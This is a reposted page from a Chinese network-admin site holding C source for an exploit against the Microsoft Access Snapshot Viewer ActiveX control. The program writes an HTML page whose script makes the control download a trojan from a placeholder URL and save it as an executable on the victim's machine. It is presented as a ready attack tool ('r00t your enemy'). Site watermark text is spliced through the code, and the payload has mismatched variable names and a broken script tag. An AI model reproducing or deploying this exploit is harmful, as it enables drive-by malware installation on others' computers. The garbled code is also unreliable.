| 网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 |
|
| Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道 |
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0
Download nice binaries into an arbitrary box
Vulnerability discovered by Oliver Lavery
http://www.securityfocus.com/bid/8536/info
Remote: Yes
greetz to str0ke */
#include <stdio.h>
#include <stdlib.h> 网管网www.bitscn.com
#define Filename "Ms-Access-SnapShot.html"
网管u家bitscn.net
FILE *File;
char data[] = "<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attaque'></object>\n"
"<script language='javascript'>\nvar arbitrary_file = 'http://path_to_trojan'\n"
"var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n"
"attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"
"<script>\n<html>"; 网管网www_bitscn_com
int main ()
{
printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n");
printf("**c0ded by callAX**\n");
printf("**r00t your enemy .| **"); 网管bitscn_com
FILE *File;
char *b0fer; 网管u家www.bitscn.net
if ( (File = fopen(Filename,"w+b")) == NULL ) {
printf("\n fopen() error");
exit(1);
}
b0fer = (char*)malloc(strlen(data));
memcpy(b0fer,data,sizeof(data)-1);
fwrite(b0fer, strlen(data), 1,File);
fclose(File); 网管u家www.bitscn.net
printf("\n\n" Filename " has been created.\n");
return 0;
}
网管朋友网www_bitscn_net
|
0
|
评论加载中…